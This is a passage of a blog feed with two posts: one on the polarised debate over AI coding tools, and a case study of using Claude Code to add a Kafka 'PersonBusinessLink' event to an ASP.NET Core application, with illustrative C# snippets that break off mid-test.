<p>But - I do find that there’s a lot of talk about AI software development tools, that just plain conflicts with my personal experience.</p>

<h3 id="stuck-in-the-middle">Stuck in the middle</h3>

<p>So here’s the problem - every day I’m flooded with articles that are ludicrously positive <em>and</em> ludicrously negative. But what I’m seeing doesn’t match either.</p>

<p>I personally find the tools helpful, powerful, and a definite boost. Maybe, as per the METR study, I’m losing more time learning the tools, tweaking the context, and reading and experimenting and correcting them when they get things wrong, than I’m actually saving.</p>

<p>But some of this is the startup cost of any new technology; some will only be paid once, some will be a slow gradual tax, especially with a technology that is changing so fast. And some will be a learning curve, as we work out when to say “Ok, this task isn’t suited to LLMs and I should just do it by hand”.</p>

<p>And they are already giving me a bunch of obvious speedups, small and large. Claude is fixing the links in this blog as I type. Claude wrote the tiny Python script I use daily to list our project’s outstanding pull requests. Claude wrote a little visualisation of git activity I needed for management. Claude is drawing simple Mermaid diagrams in our docs. Claude helped me use <a href="https://github.com/snyk/mcp-server-snyk">Snyk</a> to find that our project had an insecure dependency, and <a href="https://docs.sourcebot.dev/docs/features/mcp-server">Sourcebot</a> to find that another project of ours had the same dependency and had a viable workaround.</p>

<p>And for a larger example, I’ve written up a <a href="/2025/07/18/a-real-world-ai-coding-case-sample">separate blog post</a> detailing how I used Claude Code to implement a Kafka messaging feature in an ASP.Net Core application. This demonstrates what can actually be done with AI coding tools today - not the wild hype, not the complete dismissal, but practical reality.</p>

<h2 id="whats-next">What’s next?</h2>

<p>I’m still learning - I’ve made masses of progress in the couple of months since I started using the tools in anger, and there’s a lot more to learn!</p>

<p>I also want to learn how to guide our organisation, so our developers know how to use these tools effectively, carefully, and productively.</p>

<p>It’s an exciting time - I’m having more <em>fun</em> with these tools than I expected. There are so many benefits already, and so much potential for more.</p>

<p>But…</p>

<h2 id="dont-forget-the-downsides">Don’t forget the downsides</h2>

<p>I need this standard disclaimer at the end of any AI post. We must remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech <a href="https://en.wikipedia.org/wiki/Broligarchy">broligarchs</a><sup id="fnref:broligarchy" role="doc-noteref"><a href="#fn:broligarchy" class="footnote" rel="footnote">3</a></sup> whose interests are personal power and destabilising democracy, not helping the world.</p>

<p>They consume vast amounts of power, which, due to our failure to charge for <a href="https://en.wikipedia.org/wiki/Externality">externalities</a>, means they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is <a href="https://www.wheresyoured.at/subprimeai/">an unsustainable bubble</a> and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users.</p>

<h2 id="further-reading">Further reading</h2>

<p>I’m not alone, stuck here in the middle. For some good sensible approaches I’d also recommend <a href="https://birgitta.info/">Birgitta Böckeler</a> and <a href="https://blog.thepete.net/blog/">Pete Hodgson</a> and of course <a href="https://simonwillison.net/">Simon Willison</a>’s blog is essential reading.</p>
<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>Image from <em>Reservoir Dogs</em> (1992), directed by Quentin Tarantino. Miramax Films. Fair use for commentary and criticism. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:trifecta" role="doc-endnote">
      <p>Essential reading: <a href="https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/">Simon Willison on the lethal trifecta for AI agents</a> <a href="#fnref:trifecta" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:broligarchy" role="doc-endnote">
      <p>Thanks <a href="https://broligarchy.substack.com/about">Carole Cadwalladr</a> for introducing me to the very useful term <a href="https://en.wikipedia.org/wiki/Broligarchy">Broligarchy</a>! <a href="#fnref:broligarchy" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Korny Sietsma</name></author><category term="AI" /><category term="ai-coding-tools" /><category term="software-development" /><summary type="html"><![CDATA[I’ve had the song “Stuck in the Middle with You” in my head for a few weeks. (R.I.P. Michael Madsen!) 1 But not because of Reservoir Dogs - but because of the public discussion about AI coding tools. (Yes, I know… feel free to walk away if you are sick of the whole thing). I feel like there’s this strange culture war, or something like it, playing out - with wild statements on both extremes - and I’m stuck in the middle. Hype To the left of me There is just so much AI Hype. I’m talking here mainly about software development tools. There’s plenty more ludicrous hype when it comes to other AI areas, but I’m trying to limit this to software engineering. And the hype, as well as the naïveté, is extreme. You get people vibe coding their entire business applications with no thoughts of security. You get people claiming 50x speed improvements, or indeed “we don’t need developers at all”. You get people posting “I’m not a programmer but I used Copilot to build my entire product and it’s awesome”, with multiple variations of this. Online discussion forums seem to be full of highly risky advice - “I just turn on --dangerously-skip-permissions” or “use this MCP server which gives write access to your git repo and reads user-supplied comments”2 or even worse. Amusingly there’s also quite a few comments like “oops I deleted my whole file system, what do I do now?” or “I’m not a programmer and I got Copilot to build my product but now it’s broken and won’t change anything - I want my money back”. There’s some tasty schadenfreude here but I also feel a bit sorry for some of these people, where things started so nicely, but now technical debt, AI slop, and a lack of the knowledge of what “good” looks like, are making it all fall apart. 
A lot of the hype is just marketing - astroturfing from fake users, or just plain press releases breathlessly reported by the media, or marketing via dubious research articles. “Look at our amazing new model, it has so much more data than the last one, it is reasoning now! We ran these benchmarks to prove it!” A lot of the hype though does seem to be genuine users - lured by the quick result, the slick prototype, the dopamine hit of seeing all that code produced, without the boring course-corrections that feel like waste. Once you are high on the “look how much code I can make” drug, it’s hard not to evangelise it to everyone else. And as the last year or two have shown us, it’s very easy for people to be fooled by LLMs, which excel at looking like something they are not. People anthropomorphise the tools all the time - “Why did Claude do this dumb thing? Can’t it see the example I’m looking at of how to do it?” - they start to think this is genuine intelligence that can reason and learn, not a specific set of tools. LLMs are wonderful machines that read your data and questions and produce results in a way that feels like intelligence, but is actually just really clever pattern matching and a surrounding ecosystem of context sources and tools. Sometimes the results are amazing, occasionally they are terrible, and you always need to check the results because the process is fundamentally nondeterministic, and just because 99% of the time something worked, there’s always that 1% chance it was confidently wrong. Skeptics to the right On the other side - the anti-AI sentiment is also pretty wild. I think most of these folks are well meaning - far more so than the pro-AI hypers; my sympathy is with healthy skepticism in general. 
But they are also prone to jumping on hype - for one example the Your Brain on ChatGPT paper, which is still in pre-print, not peer reviewed, and has had some serious criticism, still got a huge amount of coverage, including Time Magazine - this includes some classic moral panic language: Her team did submit it for peer review but did not want to wait for approval, which can take eight or more months, to raise attention to an issue that Kosmyna believes is affecting children now. Oh my goodness, will nobody protect our children?! Similarly the recent study on experienced open-source developer productivity is being waved around to say “this proves they don’t work” - I think this has been shared multiple times on every single tech forum I frequent. The authors of the paper evidently expected this, and provided this table, which doesn’t seem to get as much mention as their headlines: And this interesting breakdown of likely contributing factors: This study is actually pretty interesting - it does show that we should be cautious about trusting self-assessment of how good these tools are, and it probably shows real limitations in large complex codebases. But it’s no “Ah-ha! The emperor has no clothes!” moment, as far as I can tell. (After I wrote this, I found that Simon Willison has a good discussion of this paper as well - and there’s a rather more severe critique at Cat Hicks’s blog.) I also see quite a few people who have tried the most basic, un-assisted, low-context tools, and get terrible results; and then rule out AI tools as fundamentally broken. “I used copilot and its suggestions are wrong 40% of the time, often ludicrously wrong”. This was where I was at 6 months ago - Copilot seemed like a handy yet often irritating Clippy, no big deal. I think this drives a lot of skepticism, people who feel they gave it a go, it didn’t live up to the hype, so they’ve made up their minds.
And generally there’s just a lot of anger and frustration, in reaction to the constant flood of hype: As I said before, I’m more sympathetic to the skeptics than the hypers. Especially when it comes to the broader AI industry - I’m always keen to read David Gerard’s Pivot to AI or any of Ed Zitron’s rants - see also my downsides section later. But - I do find that there’s a lot of talk about AI software development tools, that just plain conflicts with my personal experience. Stuck in the middle So here’s the problem - every day I’m flooded with articles that are ludicrously positive and ludicrously negative. But what I’m seeing doesn’t match either. I personally find the tools helpful, powerful, and a definite boost. Maybe, as per the METR study, I’m losing more time learning the tools, tweaking the context, and reading and experimenting and correcting them when they get things wrong, than I’m actually saving. But some of this is the startup cost of any new technology; some will only be paid once, some will be a slow gradual tax, especially with a technology that is changing so fast. And some will be a learning curve, as we work out when to say “Ok, this task isn’t suited to LLMs and I should just do it by hand”. And they are already giving me a bunch of obvious speedups, small and large. Claude is fixing the links in this blog as I type. Claude wrote the tiny Python script I use daily to list our project’s outstanding pull requests. Claude wrote a little visualisation of git activity I needed for management. Claude is drawing simple Mermaid diagrams in our docs. Claude helped me use Snyk to find that our project had an insecure dependency, and Sourcebot to find that another project of ours had the same dependency and had a viable workaround. And for a larger example, I’ve written up a separate blog post detailing how I used Claude Code to implement a Kafka messaging feature in an ASP.Net Core application.
This demonstrates what can actually be done with AI coding tools today - not the wild hype, not the complete dismissal, but practical reality. What’s next? I’m still learning - I’ve made masses of progress in the couple of months since I started using the tools in anger, and there’s a lot more to learn! I also want to learn how to guide our organisation, so our developers know how to use these tools effectively, carefully, and productively. It’s an exciting time - I’m having more fun with these tools than I expected. There are so many benefits already, and so much potential for more. But… Don’t forget the downsides I need this standard disclaimer at the end of any AI post. We must remember the context behind these tools - there are giant tech companies pushing these hard into every corner of our lives. They are run by horrible tech broligarchs3 whose interests are personal power and destabilising democracy, not helping the world. They consume vast amounts of power, which, due to our failure to charge for externalities, means they are burning fossil fuels, consuming scarce water, and accelerating the climate crisis. And there are many signs that the funding for this is an unsustainable bubble and the companies and tools may collapse, or start charging significantly more and/or enshittifying the experience of users. Further reading I’m not alone, stuck here in the middle. For some good sensible approaches I’d also recommend Birgitta Böckeler and Pete Hodgson and of course Simon Willison’s blog is essential reading. Image from Reservoir Dogs (1992), directed by Quentin Tarantino. Miramax Films. Fair use for commentary and criticism. &#8617; Essential reading: Simon Willison on the lethal trifecta for AI agents &#8617; Thanks Carole Cadwalladr for introducing me to the very useful term Broligarchy! 
&#8617;]]></summary></entry><entry><title type="html">A real-world AI coding case sample</title><link href="https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample" rel="alternate" type="text/html" title="A real-world AI coding case sample" /><published>2025-07-18T00:00:00+01:00</published><updated>2025-07-18T00:00:00+01:00</updated><id>https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample</id><content type="html" xml:base="https://blog.korny.info/2025/07/18/a-real-world-ai-coding-case-sample"><![CDATA[<p>I thought it’d be worth posting an example of a bigger task I did the other day - just to show what can be done, without crazy vibe-coding, on a non-greenfields app, using ASP.Net Core not some simplistic front-end tooling.</p>

<p class="notice">This was originally part of a longer post but I thought it was worth splitting - this example is used in my post <a href="/2025/07/19/clowns-to-the-left-of-me">Clowns to the left of me …</a></p>

<h2 id="the-task---sending-a-message-when-data-changes">The task - Sending a message when data changes</h2>

<p>We have an ASP.Net Core application which includes a relationship between Businesses and People, where that relationship is modeled as a collection of Contacts:</p>

<pre><code class="language-mermaid">  erDiagram
      BUSINESS {
          Guid Id PK
      }

      CONTACT {
          Guid BusinessId PK,FK
          Guid PersonId PK,FK
      }

      PERSON {
          Guid Id PK
      }

      BUSINESS ||--o{ CONTACT : "has"
      PERSON ||--o{ CONTACT : "is a"
</code></pre>

<p class="notice">Note that I have configured a lot of context in <code class="language-plaintext highlighter-rouge">CLAUDE.md</code> and linked files, including things like project structure, idioms, how to run tests, MCP servers to use, and more. The context helps a lot, but is a bit too much detail for this post.</p>

<p>I started prompting Claude Code with</p>

<blockquote>
  <p>How do we currently trigger sending Kafka events?</p>
</blockquote>

<p>This was more for my understanding than anything, but also meant Claude loaded up more on the code structure - everything it has seen in a session so far makes up its context, so having this knowledge helps with the next stage.</p>

<p>Then the main prompt:</p>

<blockquote>
  <p>“OK - I’d like to add a specific kind of event - but only when a relationship between a Business and a Contact changes. If a Contact is added to a Business, or removed from a Business, we need to send an event of type PersonBusinessLink which is defined in these classes:</p>
</blockquote>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  <span class="k">namespace</span> <span class="nn">Liberis.Events.ThisProject</span><span class="p">;</span>
  <span class="k">public</span> <span class="n">record</span> <span class="nf">PersonBusinessLink</span><span class="p">()</span>
  <span class="p">{</span>
    <span class="k">public</span> <span class="kt">string</span><span class="p">?</span> <span class="n">PersonId</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">public</span> <span class="kt">string</span><span class="p">?</span> <span class="n">BusinessId</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">public</span> <span class="n">PersonBusinessLinkType</span> <span class="n">Type</span> <span class="p">{</span> <span class="k">get</span><span class="p">;</span> <span class="k">set</span><span class="p">;</span> <span class="p">}</span>
  <span class="p">}</span>

  <span class="k">public</span> <span class="k">enum</span> <span class="n">PersonBusinessLinkType</span>
  <span class="p">{</span>
    <span class="n">PersonBusinessLinked</span><span class="p">,</span>
    <span class="n">PersonBusinessUnlinked</span><span class="p">,</span>
  <span class="p">}</span>
</code></pre></div></div>

<blockquote>
  <p>these events should be generated with the type PersonBusinessLinked if a person is added, and PersonBusinessUnlinked if a person is removed - note this mimics the existing Contact domain entity which links a Business to a Person.</p>
</blockquote>

<p>I pasted in the classes because they are generated from protobuf schemas in another project and I don’t think Claude has access to the decompiled code - it’d be interesting to work out if it could be taught to read it.</p>

<h2 id="claudes-first-attempt">Claude’s first attempt</h2>

<p>Claude churned away for a while and produced quite a good first pass. It made these changes:</p>

<ul>
  <li>the Business service was changed in the paths where a business is created, modified, or patched
    <ul>
      <li>more on this below</li>
    </ul>
  </li>
  <li>a new Domain type was added for <code class="language-plaintext highlighter-rouge">PersonBusinessLinkType</code> (following project conventions)</li>
  <li>a new Mapper method was added which took a <code class="language-plaintext highlighter-rouge">Contact</code>, a <code class="language-plaintext highlighter-rouge">businessId</code> and a <code class="language-plaintext highlighter-rouge">PersonBusinessLinkType</code> and generated a Kafka message</li>
  <li>a new Kafka topic was added “person-business-link” - this was a guess on Claude’s part, and not quite right</li>
  <li>a new handler was added to our KafkaEventDispatcher to dispatch messages to the right topic based on the new event type</li>
  <li>the Dispatcher was injected into the BusinessService</li>
</ul>
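
<p>To make the mapper step concrete, here is a minimal sketch of roughly what such a method could look like. The two event types are the ones from the prompt, tidied so they compile on their own; <code class="language-plaintext highlighter-rouge">Contact</code>, <code class="language-plaintext highlighter-rouge">KafkaMessage</code> and <code class="language-plaintext highlighter-rouge">PersonBusinessLinkMapper</code> are hypothetical stand-ins, not the real project types, and using the business ID as the message key is an assumption.</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;

// The event types from the prompt, in a form that compiles standalone.
public enum PersonBusinessLinkType
{
    PersonBusinessLinked,
    PersonBusinessUnlinked,
}

public record PersonBusinessLink
{
    public string? PersonId { get; set; }
    public string? BusinessId { get; set; }
    public PersonBusinessLinkType Type { get; set; }
}

// Hypothetical stand-in for the Contact domain entity.
public record Contact(Guid BusinessId, Guid PersonId);

// Hypothetical envelope: a partition key plus the payload.
public record KafkaMessage&lt;T&gt;(string Key, T Value);

public static class PersonBusinessLinkMapper
{
    // Builds the message for one contact being linked or unlinked.
    public static KafkaMessage&lt;PersonBusinessLink&gt; ToMessage(
        Contact contact, Guid businessId, PersonBusinessLinkType type) =&gt;
        new(
            Key: businessId.ToString(), // assumption: business ID as the key
            Value: new PersonBusinessLink
            {
                PersonId = contact.PersonId.ToString(),
                BusinessId = businessId.ToString(),
                Type = type,
            });
}
</code></pre></div></div>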

<h3 id="course-correcting-not-vibe-coding">Course correcting not vibe coding</h3>

<p>I should note, I didn’t just leave Claude going - you don’t want to let it go too far off piste<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>, so I kept an eye on changes. I have it set up to ask me before every change, so when it chose the wrong Kafka topic I said “no” to the proposed change, then told it the right topic, and it kept on going.</p>

<p>Sometimes on simple tasks I let it do more steps without checking, but that means more work cleaning up later. This is one of the interesting things to learn when working this way: when to be slow and careful, and when to go fast and accept more clean-up effort later.</p>

<p>These are the sorts of corrections I had to make:</p>

<ul>
  <li>“I think you should use the business ID as the partition key” as it chose the wrong key</li>
  <li>“We should dispatch events before committing the unit of work, so the outbox pattern works”</li>
  <li>“This should be in the namespace Foo.Bar as that’s where other similar things are”</li>
  <li>“You don’t need to log anything here, our dispatcher has observability built in”</li>
  <li>“Please don’t add that comment - only comment on things that aren’t obvious”</li>
</ul>

<p>In all these cases though, I didn’t need to write any code, I just guided it occasionally, like I would a junior developer. One who loves comments and logging and excess documentation!</p>

<p>(You can train it out of some of these things, using more initial context - but some habits are harder to shift than others)</p>
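
<p>The correction about dispatching before the commit is about ordering. Here is a minimal sketch of why the order matters, assuming an outbox where queued events only become durable as part of the commit. <code class="language-plaintext highlighter-rouge">InMemoryUnitOfWork</code> and its members are hypothetical and purely illustrative - our real unit of work is not shown in this post.</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System.Collections.Generic;

// Hypothetical in-memory stand-in for a unit of work with an outbox.
public sealed class InMemoryUnitOfWork
{
    private readonly List&lt;string&gt; _pendingRows = new List&lt;string&gt;();
    private readonly List&lt;string&gt; _pendingEvents = new List&lt;string&gt;();

    public List&lt;string&gt; CommittedRows { get; } = new List&lt;string&gt;();
    public List&lt;string&gt; Outbox { get; } = new List&lt;string&gt;();

    public void Save(string row) =&gt; _pendingRows.Add(row);

    // "Dispatching" only queues the event; nothing is sent yet.
    public void Dispatch(string evt) =&gt; _pendingEvents.Add(evt);

    // Data changes and queued events become durable together.
    public void Commit()
    {
        CommittedRows.AddRange(_pendingRows);
        Outbox.AddRange(_pendingEvents);
        _pendingRows.Clear();
        _pendingEvents.Clear();
    }
}
</code></pre></div></div>

<p>With this shape, an event dispatched after <code class="language-plaintext highlighter-rouge">Commit()</code> stays pending until some later commit, which is why the dispatch has to come first.</p>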

<h3 id="fixing-a-bigger-problem">Fixing a bigger problem</h3>

<p>I did catch it making one mistake - our method to patch a business follows roughly this logic:</p>

<ul>
  <li>Start a transaction</li>
  <li>Find the business</li>
  <li>Patch the business, returning the updated complete business object</li>
  <li>… some extra logic around related data that might have changed</li>
  <li>Commit the transaction</li>
  <li>Return a success payload</li>
</ul>

<p>The code Claude wrote was roughly:</p>

<ul>
  <li>Start a transaction</li>
  <li>Find the business</li>
  <li>Patch the business, returning the updated complete business object</li>
  <li>… some extra logic around related data that might have changed</li>
  <li><strong>Check for dispatching person/business updates:</strong>
    <ul>
      <li><strong>Fetch the original unchanged business</strong></li>
      <li><strong>Check whether the original business had added/removed people compared to the new one</strong></li>
      <li><strong>Dispatch any changes</strong></li>
    </ul>
  </li>
  <li>Commit the transaction</li>
  <li>Return a success payload</li>
</ul>
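
<p>The comparison step on its own is a pair of set differences. Here is a minimal sketch, assuming each business exposes the IDs of its linked people; <code class="language-plaintext highlighter-rouge">ContactDiff</code> and <code class="language-plaintext highlighter-rouge">LinkChange</code> are hypothetical names for illustration, not the code Claude produced.</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
using System.Collections.Generic;
using System.Linq;

public enum LinkChange { Linked, Unlinked }

public static class ContactDiff
{
    // Returns one entry per person added to, or removed from, the business.
    public static IReadOnlyList&lt;(Guid PersonId, LinkChange Change)&gt; Changes(
        IEnumerable&lt;Guid&gt; originalPersonIds, IEnumerable&lt;Guid&gt; updatedPersonIds)
    {
        var original = originalPersonIds.ToHashSet();
        var updated = updatedPersonIds.ToHashSet();

        // In the update but not the original: newly linked.
        var added = updated.Except(original)
            .Select(id =&gt; (PersonId: id, Change: LinkChange.Linked));
        // In the original but not the update: unlinked.
        var removed = original.Except(updated)
            .Select(id =&gt; (PersonId: id, Change: LinkChange.Unlinked));

        return added.Concat(removed).ToList();
    }
}
</code></pre></div></div>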

<p>Claude’s version would probably work (assuming we could read the pre-transaction data), but it was doing unnecessary work. I asked Claude:</p>

<blockquote>
  <p>Can’t we get the original business contact info earlier in the method, rather than at the end?</p>
</blockquote>

<p>And it tried - quite hard - to do this. The trouble is, we aren’t performing the logic above with procedural code - we use chained functions with monadic <code class="language-plaintext highlighter-rouge">Result</code> and <code class="language-plaintext highlighter-rouge">Option</code> return types. The chain passes a <code class="language-plaintext highlighter-rouge">Result</code> wrapping either a <code class="language-plaintext highlighter-rouge">Business</code> or an <code class="language-plaintext highlighter-rouge">Error</code> payload, and errors get passed down the chain rather than thrown as exceptions. (Sometimes it is a <code class="language-plaintext highlighter-rouge">Result&lt;Option&lt;Business&gt;&gt;</code>, when a function like <code class="language-plaintext highlighter-rouge">FindBusiness</code> might return no business without it being an error.) So the code is a bit harder for Claude to understand:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">var</span> <span class="n">result</span> <span class="p">=</span> <span class="k">await</span> <span class="n">businessRepository</span><span class="p">.</span><span class="nf">FindBusinessAsync</span><span class="p">(...)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessToUpdateOption</span> <span class="p">=&gt;</span> <span class="n">businessToUpdateOption</span><span class="p">.</span><span class="nf">Match</span><span class="p">(</span>
    <span class="n">some</span><span class="p">:</span> <span class="k">async</span> <span class="n">businessToUpdate</span> <span class="p">=&gt;</span>
    <span class="p">{</span>
      <span class="c1">// update the business and return the updated business</span>
    <span class="p">},</span>
    <span class="n">none</span><span class="p">:</span> <span class="p">()</span> <span class="p">=&gt;</span> <span class="c1">// no business so we had None - return a new Error result</span>
  <span class="p">))</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">updatedBusiness</span> <span class="p">=&gt;</span> 
    <span class="c1">// more business logic if the previous update succeeded</span>
  <span class="p">)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="k">async</span> <span class="n">updatedBusiness</span> <span class="p">=&gt;</span>
  <span class="p">{</span>
    <span class="kt">var</span> <span class="n">originalBusiness</span> <span class="p">=</span> <span class="c1">// logic to fetch the original business</span>
    <span class="c1">// the new kafka dispatch:</span>
    <span class="k">await</span> <span class="nf">DispatchContactChangeEventsAsync</span><span class="p">(</span><span class="n">originalBusiness</span><span class="p">,</span> <span class="n">updatedBusiness</span><span class="p">);</span>
    <span class="k">await</span> <span class="n">unitOfWork</span><span class="p">.</span><span class="nf">CommitAsync</span><span class="p">();</span>
    <span class="k">return</span> <span class="nf">Success</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">);</span>
  <span class="p">});</span>
</code></pre></div></div>

<p>Claude actually <em>almost</em> managed to fix this. It worked out that instead of passing <code class="language-plaintext highlighter-rouge">Result&lt;businessToUpdate&gt;</code> through the function chain, it should pass a tuple <code class="language-plaintext highlighter-rouge">Result&lt;(originalBusiness, businessToUpdate)&gt;</code> and re-threaded all the functions to match:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">var</span> <span class="n">result</span> <span class="p">=</span> <span class="k">await</span> <span class="n">businessRepository</span><span class="p">.</span><span class="nf">FindBusinessAsync</span><span class="p">(...)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessToUpdateOption</span> <span class="p">=&gt;</span> <span class="n">businessToUpdateOption</span><span class="p">.</span><span class="nf">Match</span><span class="p">(</span>
    <span class="n">some</span><span class="p">:</span> <span class="k">async</span> <span class="n">businessToUpdate</span> <span class="p">=&gt;</span>
    <span class="p">{</span>
      <span class="c1">// update the business and then</span>
      <span class="k">return</span> <span class="nf">Result</span><span class="p">(</span><span class="n">businessToUpdate</span><span class="p">,</span> <span class="n">updatedBusiness</span><span class="p">);</span>
    <span class="p">},</span>
    <span class="n">none</span><span class="p">:</span> <span class="p">()</span> <span class="p">=&gt;</span> <span class="c1">// no business so we had None - return a new Error result</span>
  <span class="p">))</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="n">businessPair</span> <span class="p">=&gt;</span> 
    <span class="c1">// destructure businessPair into (businessToUpdate, updatedBusiness)</span>
    <span class="c1">// more business logic if the previous update succeeded</span>
  <span class="p">)</span>
  <span class="p">.</span><span class="nf">ThenAsync</span><span class="p">(</span><span class="k">async</span> <span class="n">businessPair</span> <span class="p">=&gt;</span>
  <span class="p">{</span>
    <span class="c1">// the new kafka dispatch:</span>
    <span class="k">await</span> <span class="nf">DispatchContactChangeEventsAsync</span><span class="p">(</span><span class="n">businessPair</span><span class="p">.</span><span class="n">Original</span><span class="p">,</span> <span class="n">businessPair</span><span class="p">.</span><span class="n">Updated</span><span class="p">);</span>
    <span class="k">await</span> <span class="n">unitOfWork</span><span class="p">.</span><span class="nf">CommitAsync</span><span class="p">();</span>
    <span class="k">return</span> <span class="nf">Success</span><span class="p">(</span><span class="n">businessPair</span><span class="p">.</span><span class="n">Updated</span><span class="p">);</span>
  <span class="p">});</span>
</code></pre></div></div>

<p>But - it hit a compile error. One of the error paths (not shown) was still returning <code class="language-plaintext highlighter-rouge">Result&lt;Business&gt;</code>, not the tuple. It tried a few times to correct it, then gave up and said “I think the logic is right but there are still a few syntax errors”.</p>

<p>To its credit, I’d prefer this to it churning forever or hallucinating an incorrect result. I managed to fix it (with a bit of pain - we override <code class="language-plaintext highlighter-rouge">ThenAsync</code> in ways which make diagnosing this tricky even for a human) and then Claude could take over again.</p>
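
<p>To show why one stray error path breaks the chain, here is a minimal synchronous sketch of the tuple-threading idea. The <code class="language-plaintext highlighter-rouge">Result</code> type, its <code class="language-plaintext highlighter-rouge">Then</code> method, the <code class="language-plaintext highlighter-rouge">Business</code> record and <code class="language-plaintext highlighter-rouge">PatchBusinessSketch</code> are all simplified stand-ins written for this illustration - they are not our real types, which are async and also involve <code class="language-plaintext highlighter-rouge">Option</code>.</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;

// Hypothetical, much-simplified domain type.
public record Business(string Name);

// Minimal stand-in for a monadic Result: either a value or an error message.
public sealed class Result&lt;T&gt;
{
    private Result(T value, string error) { Value = value; Error = error; }

    public T Value { get; }
    public string Error { get; }
    public bool IsSuccess =&gt; Error == null;

    public static Result&lt;T&gt; Success(T value) =&gt; new Result&lt;T&gt;(value, null);
    public static Result&lt;T&gt; Failure(string error) =&gt; new Result&lt;T&gt;(default, error);

    // Run the next step only on success; otherwise pass the error down the chain.
    public Result&lt;TOut&gt; Then&lt;TOut&gt;(Func&lt;T, Result&lt;TOut&gt;&gt; next) =&gt;
        IsSuccess ? next(Value) : Result&lt;TOut&gt;.Failure(Error);
}

public static class PatchBusinessSketch
{
    public static Result&lt;Business&gt; Patch(Result&lt;Business&gt; found, string newName) =&gt;
        found
            // Carry the original alongside the update from here on.
            .Then(original =&gt; Result&lt;(Business Original, Business Updated)&gt;.Success(
                (original, original with { Name = newName })))
            // Every later step, including its error path, must use the tuple type.
            .Then(pair =&gt; pair.Updated.Name.Length == 0
                ? Result&lt;(Business Original, Business Updated)&gt;.Failure("name is empty")
                : Result&lt;(Business Original, Business Updated)&gt;.Success(pair))
            // The last step can see both versions, then unwraps to a Business.
            .Then(pair =&gt; Result&lt;Business&gt;.Success(pair.Updated));
}
</code></pre></div></div>

<p>If the failure branch in the middle step returned a <code class="language-plaintext highlighter-rouge">Result&lt;Business&gt;</code> instead, the two branches of the conditional would no longer have a common type and the chain would stop compiling, which is the kind of mismatch described above.</p>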

<h2 id="testing">Testing</h2>

<p>I really should have started with a test! I do have instructions in my context about testing, but neither Claude nor I did this in proper TDD fashion.</p>

<p>But when I asked</p>

<blockquote>
  <p>Can you find an integration test that can test the new event? Just change one test for now to see if it is working.</p>
</blockquote>

<p>Claude went away, found an integration test (we use Test Containers to test against dockerised Kafka) and modified it quite sensibly. It took a test that was roughly:</p>

<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">Fact</span><span class="p">]</span>
<span class="k">public</span> <span class="k">async</span> <span class="n">Task</span> <span class="nf">UpdateBusinessAsync_UpdatesBusiness</span><span class="p">()</span>
<span class="p">{</span>
  <span class="c1">// Arrange</span>
  <span class="kt">var</span> <span class="n">businessRequest</span> <span class="p">=</span> <span class="nf">ARandomBusinessRequest</span><span class="p">(...);</span>
  <span class="kt">var</span> <span class="n">createBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">CreateBusinessAsync</span><span class="p">(</span><span class="n">businessRequest</span><span class="p">);</span>
  <span class="kt">var</span> <span class="n">updatedBusiness</span> <span class="p">=</span> <span class="c1">// logic to update the business including new People</span>
  <span class="c1">// Act</span>
  <span class="kt">var</span> <span class="n">response</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">UpdateBusinessAsync</span><span class="p">(</span><span class="n">updatedBusiness</span><span class="p">);</span>
  <span class="c1">// Assert</span>
  <span class="kt">var</span> <span class="n">getBusinessResponse</span> <span class="p">=</span> <span class="k">await</span> <span class="nf">GetBusinessAsync</span><span class="p">(</span><span class="n">createBusinessResponse</span><span class="p">.</span><span class="n">Id</span><span class="p">);</span>
  <span class="c1">// lots of assertions</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And made it</p>
<div class="language-csharp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="n">Fact</span><span class="p">]</span>
<span class="k">public</span> <span class="k">async</span> <span class="n">Task</span> <span class="nf">UpdateBusinessAsync_UpdatesBusiness</span><span class="p">()</span>
<span class="p">{</span>
  <span class="c1">// Reset shared state</span>
  <span class="nf">ClearReceivedKafkaEvents</span><span class="p">(</span><span class="n">Topics</span><span class="p">.</span><span class="n">PersonBusinessLink</span><span class="p">);</span>

  <span class="c1">// Arrange</span>
  <span class="kt">var</span> <span class="n">businessRequest</span> <span class="p">=</span> <span class="nf">ARandomBusinessRequest</span><span class="p">(...);</span>
